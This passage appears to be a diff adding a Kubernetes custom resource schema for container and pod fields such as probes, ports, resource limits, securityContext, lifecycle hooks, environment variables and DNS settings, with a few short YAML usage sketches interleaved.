repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. 
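A minimal sketch of the postStart/preStop handlers specified by the lifecycle schema above; the command and drain endpoint are assumptions:

    lifecycle:
      postStart:
        exec:
          # exec is not run in a shell, so the shell is invoked explicitly
          command: ["/bin/sh", "-c", "echo started > /tmp/started"]
      preStop:
        httpGet:
          path: /shutdown     # hypothetical drain endpoint
          port: 8080
          scheme: HTTP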
+ type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + name: + description: Name of the container specified as a DNS_LABEL. Each container in a pod must have a unique name (DNS_LABEL). Cannot be updated. + type: string + ports: + description: List of ports to expose from the container. Exposing a port here gives the system additional information about the network connections a container uses, but is primarily informational. Not specifying a port here DOES NOT prevent that port from being exposed. Any port which is listening on the default "0.0.0.0" address inside a container will be accessible from the network. Cannot be updated. + items: + description: ContainerPort represents a network port in a single container. + properties: + containerPort: + description: Number of port to expose on the pod's IP address. This must be a valid port number, 0 < x < 65536. 
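Putting the livenessProbe fields just described together, a hedged example; the /healthz path and port 8080 are assumptions:

    livenessProbe:
      httpGet:
        path: /healthz            # hypothetical health endpoint
        port: 8080
      initialDelaySeconds: 5      # wait before the first probe
      periodSeconds: 10           # probe every 10 seconds (the default)
      failureThreshold: 3         # restart after 3 consecutive failures
      timeoutSeconds: 1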
+ format: int32 + type: integer + hostIP: + description: What host IP to bind the external port to. + type: string + hostPort: + description: Number of port to expose on the host. If specified, this must be a valid port number, 0 < x < 65536. If HostNetwork is specified, this must match ContainerPort. Most containers do not need this. + format: int32 + type: integer + name: + description: If specified, this must be an IANA_SVC_NAME and unique within the pod. Each named port in a pod must have a unique name. Name for the port that can be referred to by services. + type: string + protocol: + default: TCP + description: Protocol for port. Must be UDP, TCP, or SCTP. Defaults to "TCP". + type: string + required: + - containerPort + type: object + type: array + x-kubernetes-list-map-keys: + - containerPort + - protocol + x-kubernetes-list-type: map + readinessProbe: + description: 'Periodic probe of container service readiness. Container will be removed from service endpoints if the probe fails. Cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. 
Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + resources: + description: 'Compute Resources required by this container. Cannot be updated. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + properties: + limits: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Limits describes the maximum amount of compute resources allowed. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + requests: + additionalProperties: + anyOf: + - type: integer + - type: string + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + description: 'Requests describes the minimum amount of compute resources required. If Requests is omitted for a container, it defaults to Limits if that is explicitly specified, otherwise to an implementation-defined value. More info: https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/' + type: object + type: object + securityContext: + description: 'SecurityContext defines the security options the container should be run with. If set, the fields of SecurityContext override the equivalent fields of PodSecurityContext. More info: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/' + properties: + allowPrivilegeEscalation: + description: 'AllowPrivilegeEscalation controls whether a process can gain more privileges than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. 
AllowPrivilegeEscalation is true always when the container is: 1) run as Privileged 2) has CAP_SYS_ADMIN' + type: boolean + capabilities: + description: The capabilities to add/drop when running containers. Defaults to the default set of capabilities granted by the container runtime. + properties: + add: + description: Added capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + drop: + description: Removed capabilities + items: + description: Capability represent POSIX capabilities type + type: string + type: array + type: object + privileged: + description: Run container in privileged mode. Processes in privileged containers are essentially equivalent to root on the host. Defaults to false. + type: boolean + procMount: + description: procMount denotes the type of proc mount to use for the containers. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. This requires the ProcMountType feature flag to be enabled. + type: string + readOnlyRootFilesystem: + description: Whether this container has a read-only root filesystem. Default is false. + type: boolean + runAsGroup: + description: The GID to run the entrypoint of the container process. Uses runtime default if unset. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + runAsNonRoot: + description: Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. If unset or false, no such validation will be performed. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: boolean + runAsUser: + description: The UID to run the entrypoint of the container process. Defaults to user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + format: int64 + type: integer + seLinuxOptions: + description: The SELinux context to be applied to the container. If unspecified, the container runtime will allocate a random SELinux context for each container. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + level: + description: Level is SELinux level label that applies to the container. + type: string + role: + description: Role is a SELinux role label that applies to the container. + type: string + type: + description: Type is a SELinux type label that applies to the container. + type: string + user: + description: User is a SELinux user label that applies to the container. + type: string + type: object + seccompProfile: + description: The seccomp options to use by this container. If seccomp options are provided at both the pod & container level, the container options override the pod options. + properties: + localhostProfile: + description: localhostProfile indicates a profile defined in a file on the node should be used. The profile must be preconfigured on the node to work. Must be a descending path, relative to the kubelet's configured seccomp profile location. Must only be set if type is "Localhost". 
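Taken together, these securityContext fields support a locked-down container like the following sketch (the UID is an illustrative assumption):

    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      runAsNonRoot: true
      runAsUser: 1000             # hypothetical non-root UID
      capabilities:
        drop:
          - ALL                   # drop every default POSIX capability
      seccompProfile:
        type: RuntimeDefault      # container runtime's default profile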
+ type: string + type: + description: "type indicates which kind of seccomp profile will be applied. Valid options are: \n Localhost - a profile defined in a file on the node should be used. RuntimeDefault - the container runtime default profile should be used. Unconfined - no profile should be applied." + type: string + required: + - type + type: object + windowsOptions: + description: The Windows specific settings applied to all containers. If unspecified, the options from the PodSecurityContext will be used. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + properties: + gmsaCredentialSpec: + description: GMSACredentialSpec is where the GMSA admission webhook (https://github.com/kubernetes-sigs/windows-gmsa) inlines the contents of the GMSA credential spec named by the GMSACredentialSpecName field. + type: string + gmsaCredentialSpecName: + description: GMSACredentialSpecName is the name of the GMSA credential spec to use. + type: string + hostProcess: + description: HostProcess determines if a container should be run as a 'Host Process' container. This field is alpha-level and will only be honored by components that enable the WindowsHostProcessContainers feature flag. Setting this field without the feature flag will result in errors when validating the Pod. All of a Pod's containers must have the same effective HostProcess value (it is not allowed to have a mix of HostProcess containers and non-HostProcess containers). In addition, if HostProcess is true then HostNetwork must also be set to true. + type: boolean + runAsUserName: + description: The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence. + type: string + type: object + type: object + startupProbe: + description: 'StartupProbe indicates that the Pod has successfully initialized. If specified, no other probes are executed until this completes successfully. If this probe fails, the Pod will be restarted, just as if the livenessProbe failed. This can be used to provide different probe parameters at the beginning of a Pod''s lifecycle, when it might take a long time to load data or warm a cache, than during steady-state operation. This cannot be updated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. 
You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + initialDelaySeconds: + description: 'Number of seconds after the container has started before liveness probes are initiated. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + periodSeconds: + description: How often (in seconds) to perform the probe. Default to 10 seconds. Minimum value is 1. + format: int32 + type: integer + successThreshold: + description: Minimum consecutive successes for the probe to be considered successful after having failed. Defaults to 1. Must be 1 for liveness and startup. Minimum value is 1. + format: int32 + type: integer + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + terminationGracePeriodSeconds: + description: Optional duration in seconds the pod needs to terminate gracefully upon probe failure. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. If this value is nil, the pod's terminationGracePeriodSeconds will be used. Otherwise, this value overrides the value provided by the pod spec. Value must be non-negative integer. The value zero indicates stop immediately via the kill signal (no opportunity to shut down). This is a beta field and requires enabling ProbeTerminationGracePeriod feature gate. Minimum value is 1. spec.terminationGracePeriodSeconds is used if unset. + format: int64 + type: integer + timeoutSeconds: + description: 'Number of seconds after which the probe times out. Defaults to 1 second. Minimum value is 1. More info: https://kubernetes.io/docs/concepts/workloads/pods/pod-lifecycle#container-probes' + format: int32 + type: integer + type: object + stdin: + description: Whether this container should allocate a buffer for stdin in the container runtime. If this is not set, reads from stdin in the container will always result in EOF. Default is false. + type: boolean + stdinOnce: + description: Whether the container runtime should close the stdin channel after it has been opened by a single attach. 
When stdin is true the stdin stream will remain open across multiple attach sessions. If stdinOnce is set to true, stdin is opened on container start, is empty until the first client attaches to stdin, and then remains open and accepts data until the client disconnects, at which time stdin is closed and remains closed until the container is restarted. If this flag is false, a container processes that reads from stdin will never receive an EOF. Default is false + type: boolean + terminationMessagePath: + description: 'Optional: Path at which the file to which the container''s termination message will be written is mounted into the container''s filesystem. Message written is intended to be brief final status, such as an assertion failure message. Will be truncated by the node if greater than 4096 bytes. The total message length across all containers will be limited to 12kb. Defaults to /dev/termination-log. Cannot be updated.' + type: string + terminationMessagePolicy: + description: Indicate how the termination message should be populated. File will use the contents of terminationMessagePath to populate the container status message on both success and failure. FallbackToLogsOnError will use the last chunk of container log output if the termination message file is empty and the container exited with an error. The log output is limited to 2048 bytes or 80 lines, whichever is smaller. Defaults to File. Cannot be updated. + type: string + tty: + description: Whether this container should allocate a TTY for itself, also requires 'stdin' to be true. Default is false. + type: boolean + volumeDevices: + description: volumeDevices is the list of block devices to be used by the container. + items: + description: volumeDevice describes a mapping of a raw block device within a container. + properties: + devicePath: + description: devicePath is the path inside of the container that the device will be mapped to. + type: string + name: + description: name must match the name of a persistentVolumeClaim in the pod + type: string + required: + - devicePath + - name + type: object + type: array + volumeMounts: + description: Pod volumes to mount into the container's filesystem. Cannot be updated. + items: + description: VolumeMount describes a mounting of a Volume within a container. + properties: + mountPath: + description: Path within the container at which the volume should be mounted. Must not contain ':'. + type: string + mountPropagation: + description: mountPropagation determines how mounts are propagated from the host to container and the other way around. When not set, MountPropagationNone is used. This field is beta in 1.10. + type: string + name: + description: This must match the Name of a Volume. + type: string + readOnly: + description: Mounted read-only if true, read-write otherwise (false or unspecified). Defaults to false. + type: boolean + subPath: + description: Path within the volume from which the container's volume should be mounted. Defaults to "" (volume's root). + type: string + subPathExpr: + description: Expanded path within the volume from which the container's volume should be mounted. Behaves similarly to SubPath but environment variable references $(VAR_NAME) are expanded using the container's environment. Defaults to "" (volume's root). SubPathExpr and SubPath are mutually exclusive. + type: string + required: + - mountPath + - name + type: object + type: array + workingDir: + description: Container's working directory. 
If not specified, the container runtime's default will be used, which might be configured in the container image. Cannot be updated. + type: string + required: + - name + type: object + type: array + dnsConfig: + description: Specifies the DNS parameters of a pod. Parameters specified here will be merged to the generated DNS configuration based on DNSPolicy. + properties: + nameservers: + description: A list of DNS name server IP addresses. This will be appended to the base nameservers generated from DNSPolicy. Duplicated nameservers will be removed. + items: + type: string + type: array + options: + description: A list of DNS resolver options. This will be merged with the base options generated from DNSPolicy. Duplicated entries will be removed. Resolution options given in Options will override those that appear in the base DNSPolicy. + items: + description: PodDNSConfigOption defines DNS resolver options of a pod. + properties: + name: + description: Required. + type: string + value: + type: string + type: object + type: array + searches: + description: A list of DNS search domains for host-name lookup. This will be appended to the base search paths generated from DNSPolicy. Duplicated search paths will be removed. + items: + type: string + type: array + type: object + dnsPolicy: + description: Set DNS policy for the pod. Defaults to "ClusterFirst". Valid values are 'ClusterFirstWithHostNet', 'ClusterFirst', 'Default' or 'None'. DNS parameters given in DNSConfig will be merged with the policy selected with DNSPolicy. To have DNS options set along with hostNetwork, you have to specify DNS policy explicitly to 'ClusterFirstWithHostNet'. + type: string + enableServiceLinks: + description: 'EnableServiceLinks indicates whether information about services should be injected into pod''s environment variables, matching the syntax of Docker links. Optional: Defaults to true.' + type: boolean + ephemeralContainers: + description: List of ephemeral containers run in this pod. Ephemeral containers may be run in an existing pod to perform user-initiated actions such as debugging. This list cannot be specified when creating a pod, and it cannot be modified by updating the pod spec. In order to add an ephemeral container to an existing pod, use the pod's ephemeralcontainers subresource. This field is alpha-level and is only honored by servers that enable the EphemeralContainers feature. + items: + description: An EphemeralContainer is a container that may be added temporarily to an existing pod for user-initiated activities such as debugging. Ephemeral containers have no resource or scheduling guarantees, and they will not be restarted when they exit or when a pod is removed or restarted. If an ephemeral container causes a pod to exceed its resource allocation, the pod may be evicted. Ephemeral containers may not be added by directly updating the pod spec. They must be added via the pod's ephemeralcontainers subresource, and they will appear in the pod spec once added. This is an alpha feature enabled by the EphemeralContainers feature flag. + properties: + args: + description: 'Arguments to the entrypoint. The docker image''s CMD is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". 
Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + command: + description: 'Entrypoint array. Not executed within a shell. The docker image''s ENTRYPOINT is used if this is not provided. Variable references $(VAR_NAME) are expanded using the container''s environment. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Cannot be updated. More info: https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell' + items: + type: string + type: array + env: + description: List of environment variables to set in the container. Cannot be updated. + items: + description: EnvVar represents an environment variable present in a Container. + properties: + name: + description: Name of the environment variable. Must be a C_IDENTIFIER. + type: string + value: + description: 'Variable references $(VAR_NAME) are expanded using the previously defined environment variables in the container and any service environment variables. If a variable cannot be resolved, the reference in the input string will be unchanged. Double $$ are reduced to a single $, which allows for escaping the $(VAR_NAME) syntax: i.e. "$$(VAR_NAME)" will produce the string literal "$(VAR_NAME)". Escaped references will never be expanded, regardless of whether the variable exists or not. Defaults to "".' + type: string + valueFrom: + description: Source for the environment variable's value. Cannot be used if value is not empty. + properties: + configMapKeyRef: + description: Selects a key of a ConfigMap. + properties: + key: + description: The key to select. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap or its key must be defined + type: boolean + required: + - key + type: object + fieldRef: + description: 'Selects a field of the pod: supports metadata.name, metadata.namespace, `metadata.labels['''']`, `metadata.annotations['''']`, spec.nodeName, spec.serviceAccountName, status.hostIP, status.podIP, status.podIPs.' + properties: + apiVersion: + description: Version of the schema the FieldPath is written in terms of, defaults to "v1". + type: string + fieldPath: + description: Path of the field to select in the specified API version. + type: string + required: + - fieldPath + type: object + resourceFieldRef: + description: 'Selects a resource of the container: only resources limits and requests (limits.cpu, limits.memory, limits.ephemeral-storage, requests.cpu, requests.memory and requests.ephemeral-storage) are currently supported.' 
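Stepping back to the pod-level fields described above, a sketch combining dnsConfig with a container volume mount; the resolver address, ConfigMap, and image are hypothetical:

    spec:
      dnsPolicy: "None"                  # use only the options below
      dnsConfig:
        nameservers:
          - 10.0.0.10                    # hypothetical resolver IP
        options:
          - name: ndots
            value: "2"
      containers:
        - name: app                      # hypothetical container
          image: example.com/app:1.0     # hypothetical image
          volumeMounts:
            - name: config               # must match the volume name below
              mountPath: /etc/app
              readOnly: true
      volumes:
        - name: config
          configMap:
            name: app-config             # hypothetical ConfigMap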
+ properties: + containerName: + description: 'Container name: required for volumes, optional for env vars' + type: string + divisor: + anyOf: + - type: integer + - type: string + description: Specifies the output format of the exposed resources, defaults to "1" + pattern: ^(\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))(([KMGTPE]i)|[numkMGTPE]|([eE](\+|-)?(([0-9]+(\.[0-9]*)?)|(\.[0-9]+))))?$ + x-kubernetes-int-or-string: true + resource: + description: 'Required: resource to select' + type: string + required: + - resource + type: object + secretKeyRef: + description: Selects a key of a secret in the pod's namespace + properties: + key: + description: The key of the secret to select from. Must be a valid secret key. + type: string + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret or its key must be defined + type: boolean + required: + - key + type: object + type: object + required: + - name + type: object + type: array + envFrom: + description: List of sources to populate environment variables in the container. The keys defined within a source must be a C_IDENTIFIER. All invalid keys will be reported as an event when the container is starting. When a key exists in multiple sources, the value associated with the last source will take precedence. Values defined by an Env with a duplicate key will take precedence. Cannot be updated. + items: + description: EnvFromSource represents the source of a set of ConfigMaps + properties: + configMapRef: + description: The ConfigMap to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the ConfigMap must be defined + type: boolean + type: object + prefix: + description: An optional identifier to prepend to each key in the ConfigMap. Must be a C_IDENTIFIER. + type: string + secretRef: + description: The Secret to select from + properties: + name: + description: 'Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?' + type: string + optional: + description: Specify whether the Secret must be defined + type: boolean + type: object + type: object + type: array + image: + description: 'Docker image name. More info: https://kubernetes.io/docs/concepts/containers/images' + type: string + imagePullPolicy: + description: 'Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. Cannot be updated. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images' + type: string + lifecycle: + description: Lifecycle is not allowed for ephemeral containers. + properties: + postStart: + description: 'PostStart is called immediately after a container is created. If the handler fails, the container is terminated and restarted according to its restart policy. Other management of the container blocks until the hook completes. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. 
+ properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + preStop: + description: 'PreStop is called immediately before a container is terminated due to an API request or management event such as liveness/startup probe failure, preemption, resource contention, etc. The handler is not called if the container crashes or exits. The reason for termination is passed to the handler. The Pod''s termination grace period countdown begins before the PreStop hooked is executed. Regardless of the outcome of the handler, the container will eventually terminate within the Pod''s termination grace period. Other management of the container blocks until the hook completes or until the termination grace period is reached. More info: https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/#container-hooks' + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + httpGet: + description: HTTPGet specifies the http request to perform. 
+ properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. + type: string + required: + - port + type: object + tcpSocket: + description: 'TCPSocket specifies an action involving a TCP port. TCP hooks not yet supported TODO: implement a realistic TCP lifecycle hook' + properties: + host: + description: 'Optional: Host name to connect to, defaults to the pod IP.' + type: string + port: + anyOf: + - type: integer + - type: string + description: Number or name of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + required: + - port + type: object + type: object + type: object + livenessProbe: + description: Probes are not allowed for ephemeral containers. + properties: + exec: + description: One and only one of the following should be specified. Exec specifies the action to take. + properties: + command: + description: Command is the command line to execute inside the container, the working directory for the command is root ('/') in the container's filesystem. The command is simply exec'd, it is not run inside a shell, so traditional shell instructions ('|', etc) won't work. To use a shell, you need to explicitly call out to that shell. Exit status of 0 is treated as live/healthy and non-zero is unhealthy. + items: + type: string + type: array + type: object + failureThreshold: + description: Minimum consecutive failures for the probe to be considered failed after having succeeded. Defaults to 3. Minimum value is 1. + format: int32 + type: integer + httpGet: + description: HTTPGet specifies the http request to perform. + properties: + host: + description: Host name to connect to, defaults to the pod IP. You probably want to set "Host" in httpHeaders instead. + type: string + httpHeaders: + description: Custom headers to set in the request. HTTP allows repeated headers. + items: + description: HTTPHeader describes a custom header to be used in HTTP probes + properties: + name: + description: The header field name + type: string + value: + description: The header field value + type: string + required: + - name + - value + type: object + type: array + path: + description: Path to access on the HTTP server. + type: string + port: + anyOf: + - type: integer + - type: string + description: Name or number of the port to access on the container. Number must be in the range 1 to 65535. Name must be an IANA_SVC_NAME. + x-kubernetes-int-or-string: true + scheme: + description: Scheme to use for connecting to the host. Defaults to HTTP. 
